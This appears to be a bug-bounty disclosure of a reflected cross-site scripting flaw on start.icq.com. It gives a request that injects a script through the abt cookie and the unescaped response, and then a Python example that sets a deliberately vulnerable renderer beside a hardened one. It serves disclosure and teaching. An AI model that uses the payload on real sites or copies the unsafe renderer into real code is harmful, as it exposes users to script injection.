Mail.ru: [start.icq.com] Reflected XSS via Cookies

2015-08-20T03:29:00
ID H1:83576
Type hackerone
Reporter bigbear_
Modified 2015-10-21T11:27:49

Description

Request:

GET / HTTP/1.1
Cookie: geo=380; icqsrch_lang=ua; abt=1"><script>alert(document.domain)</script><a href="; icq_pref=medium%3A_blank
Referer: http://start.icq.com/
Host: start.icq.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Response:

<div class="d3-1-3" id="icq_ads" onmouseover="showIcqAd('block')" onmouseout="showIcqAd('none')">
  <a href="//www.icq.com/download/mobile/ua?sp=1"><script>alert(document.domain)</script><a href="" target="_blank" onclick="call_ga_event('icq_ads', 'ver_1')">
    <img src="//search.icq.com/search/img/new/mobile.jpg" border="0"/>
  </a>
  <div class="d3-1-3-1">
    <div class="d3-1-3-1-1">
      <a href="//www.icq.com/download/mobile/ua?sp=1"><script>alert(document.domain)</script><a href="" target="_blank" onclick="call_ga_event('icq_ads', 'ver_1')" style="text-decoration:none; color:#000000;">
        ICQ Mobile
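The response above shows the abt cookie landing unescaped inside the href attribute after sp=. The following is an added example, not code from the report or from Mail.ru: it reproduces that pattern next to a hardened renderer. The template shape, the allowlist formats and the fallback values are assumptions inferred from the visible request and response.

```python
import html
import re
from urllib.parse import quote

# Constructed sample: the Cookie header from the report's request.
COOKIE_HEADER = ('geo=380; icqsrch_lang=ua; '
                 'abt=1"><script>alert(document.domain)</script><a href="; '
                 'icq_pref=medium%3A_blank')

# Assumed template, inferred from the response: lang and abt fill the two slots.
LINK = '<a href="//www.icq.com/download/mobile/%s?sp=%s" target="_blank">'

# Assumed value formats and fallbacks; the report does not document them.
LANG_RE, DEFAULT_LANG = re.compile(r"[a-z]{2}"), "en"
ABT_RE, DEFAULT_ABT = re.compile(r"[0-9]{1,3}"), "1"


def parse_cookies(header):
    """Split a Cookie header on ';' and each pair on its first '='."""
    pairs = (item.strip().partition("=") for item in header.split(";"))
    return {name: value for name, _, value in pairs if name}


def render_unsafe(cookies):
    """Flawed pattern: raw cookie values are concatenated into the attribute."""
    return LINK % (cookies.get("icqsrch_lang", DEFAULT_LANG),
                   cookies.get("abt", DEFAULT_ABT))


def encode_for_href_query(value):
    """Percent-encode for the URL, then HTML-escape for the attribute."""
    return html.escape(quote(value, safe=""), quote=True)


def render_safe(cookies):
    """Allowlist each value, then encode for the output context anyway."""
    lang = cookies.get("icqsrch_lang", "")
    abt = cookies.get("abt", "")
    lang = lang if LANG_RE.fullmatch(lang) else DEFAULT_LANG
    abt = abt if ABT_RE.fullmatch(abt) else DEFAULT_ABT
    return LINK % (encode_for_href_query(lang), encode_for_href_query(abt))


if __name__ == "__main__":
    jar = parse_cookies(COOKIE_HEADER)
    print(render_unsafe(jar))   # markup from the cookie breaks out of href
    print(render_safe(jar))     # abt fails the allowlist and falls back
```

Cookies are client-controlled input like any other request field, so the renderer treats them the same way as query parameters: validate against the expected format, then encode for the exact output context.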